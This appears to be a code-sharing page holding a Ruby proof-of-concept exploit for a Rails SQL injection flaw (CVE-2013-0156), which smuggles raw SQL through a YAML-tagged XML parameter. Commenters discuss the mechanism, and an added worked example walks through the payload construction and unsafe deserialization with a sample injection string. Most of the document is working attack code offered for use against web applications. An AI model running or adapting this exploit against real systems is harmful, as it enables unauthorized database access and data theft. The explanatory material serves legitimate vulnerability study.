Proof-of-Concept exploit for Rails SQL Injection (CVE-2013-0156)

rails_sqli.rb
#!/usr/bin/env ruby
#
# Proof-of-Concept exploit for Rails SQL Injection (CVE-2013-0156)
#
# ## Advisory
#
# https://groups.google.com/forum/#!topic/rubyonrails-security/61bkgvnSGTQ/discussion
#
# ## Caveats
#
# * Only find_by_*() methods that are passed params are vulnerable.
#
# ## Synopsis
#
#     $ rails_sqli.rb URL PARAM SQL
#
# ## Dependencies
#
#     $ gem install ronin-support
#
# ## Example
#
#     $ rails_sqli.rb http://localhost:3000/secrets/search secret SQL
#
# ### config/routes.rb
#
#     resources :secrets do
#       collection do
#         post :search
#       end
#     end
#
# ### app/controllers/secrets_controller.rb
#
#     def search
#       @secret = Secret.find_by_secret(params[:secret])
#
#       render :json => @secret
#     end
#
# ## License
#
# Copyright (c) 2013 Postmodern
#
# This exploit is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This exploit is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this exploit. If not, see <http://www.gnu.org/licenses/>.
#
# ## Shoutz
#
# drraid, cd, px, sanitybit, sysfail, trent, dbcooper, goldy, coderman, letch,
# starik, toby, jlt, HockeyInJune, cloud, zek, natron, amesc, postmodern,
# mephux, nullthreat, evoltech, flatline, r0bglesson, @ericmonti, @bascule,
# @charliesome, @homakov, @envygeek, @chendo, @bitsweat (for creating the vuln),
# @tenderlove (for fixing it), Fun Town Auto, garbage pail kids, hipsters,
# the old Jolly Inn, Irvin Santiago, that heavy metal dude who always bummed
# cigarettes off us, SophSec crew and affiliates.
#

require 'ronin/network/http'
require 'ronin/formatting/html'
require 'ronin/ui/output'

include Ronin::Network::HTTP
include Ronin::UI::Output::Helpers

unless ARGV.length == 3
  $stderr.puts "usage: #{$0} URL PARAM SQL"
  exit(-1)
end

url   = ARGV[0]
param = ARGV[1]
sql   = ARGV[2]

# A YAML document whose tag makes the YAML loader build an
# Arel::Nodes::SqlLiteral (a String subclass) instead of a plain String.
# String#dump yields a double-quoted, escaped scalar.
yaml = "--- !ruby/string:Arel::Nodes::SqlLiteral #{sql.dump}"

# Wrap the YAML in an XML parameter with type="yaml"; vulnerable Rails
# versions hand such nodes to the YAML loader when parsing XML bodies.
xml = %{
<?xml version="1.0" encoding="UTF-8"?>
<#{param} type="yaml">#{yaml.html_escape}</#{param}>
}.strip

print_info "POSTing SQLi to #{url} ..."

response = http_post(
  :url     => url,
  :headers => {
    # text/xml selects the XML params parser
    :content_type           => 'text/xml',
    :x_http_method_override => 'get'
  },
  :body    => xml
)

print_debug "Received #{response.code} response"

# Net::HTTPResponse#code is a String
case response.code
when '200' then print_info  "Success!"
when '404' then print_error "Not found"
when '500' then print_error "Error!"
end

Can you tell me how you use Arel::Nodes::SqlLiteral to attack find_by_secret? Thanks

Add a comma at the end of line 96.

Owner

@mephux newb mistake. thanks for catching that.

Owner

@bachue check out the lengthy write-up. Basically Arel::Nodes::SqlLiteral represents raw SQL that is dumped into the resulting SQL expression.

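The mechanism in the reply above, and the body that rails_sqli.rb builds, walked through end to end as an added example (this is not code from the gist, from Rails or from Arel). It assumes a stand-in Arel::Nodes::SqlLiteral that only mirrors the real class being a String subclass, a regex in place of the Rails XML parser, a toy predicate renderer in place of Arel's visitor, and a constructed payload `NULL OR 1=1`; the query shape is a simplification of what find_by_* produced.

```ruby
# Added example, not part of the gist. Three stages:
#   1. build the XML body with a type="yaml" parameter, as rails_sqli.rb does;
#   2. deserialize that node with YAML: the !ruby/string tag turns the value into
#      an Arel::Nodes::SqlLiteral instance instead of a plain String;
#   3. render a toy "column = value" predicate that, like Arel, quotes plain
#      Strings but emits SqlLiteral verbatim.
require 'yaml'
require 'cgi'

module Arel
  module Nodes
    # Stand-in (assumption): the real class is also a String subclass.
    class SqlLiteral < String; end
  end
end

# Stage 1: same body construction as rails_sqli.rb.
def build_xml_body(param, sql)
  yaml = "--- !ruby/string:Arel::Nodes::SqlLiteral #{sql.dump}"
  %{<?xml version="1.0" encoding="UTF-8"?>\n<#{param} type="yaml">#{CGI.escapeHTML(yaml)}</#{param}>}
end

# Stage 2: what a vulnerable XML params parser did with a type="yaml" node:
# hand the node text to the YAML loader with Ruby object tags honoured.
# (Regex instead of a real XML parser: a simplification for the example.)
def parse_xml_params(body)
  m = body.match(%r{<(\w+)\s+type="yaml">(.*?)</\1>}m)
  raise ArgumentError, 'no type="yaml" parameter found' unless m
  name, text = m[1], CGI.unescapeHTML(m[2])
  # Psych >= 4 makes YAML.load safe; older Psych only has the unsafe load.
  value = YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(text) : YAML.load(text)
  { name => value }
end

# Stage 3: toy renderer. Arel's visitor makes the same split: a String is
# quoted, an Arel::Nodes::SqlLiteral is returned untouched.
def render_equality(column, value)
  rhs = case value
        when Arel::Nodes::SqlLiteral then value.to_s
        when String then "'#{value.gsub("'", "''")}'"
        else raise ArgumentError, "unsupported value #{value.class}"
        end
  %{SELECT "secrets".* FROM "secrets" WHERE "secrets"."#{column}" = #{rhs} LIMIT 1}
end

if __FILE__ == $0
  payload = 'NULL OR 1=1'   # constructed sample payload
  params  = parse_xml_params(build_xml_body('secret', payload))
  # Via the YAML tag: the payload lands in the query unquoted.
  puts render_equality('secret', params['secret'])
  # Same text as a plain param value: it is just a quoted string.
  puts render_equality('secret', payload)
end
```

The two `puts` lines show the whole difference: the literal is placed into the predicate as-is, so the injected text must itself be valid SQL in the `"secrets"."secret" = ...` position, whereas the same text submitted as an ordinary string is quoted and compared as data.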
@postmodern could you give an example please? I found that whatever SQL I passed was being treated as the value for the param, in this case secret => OR NULL. I was unable to interpolate quotation marks as these were being stripped out, and I kept running into 'column does not exist' errors?

My example worked on a /posts/search route acting on @posts = Post.find_by_name(params[:name]). Therefore, I need to pass a string + extra SQL I wish to inject. Thoughts?
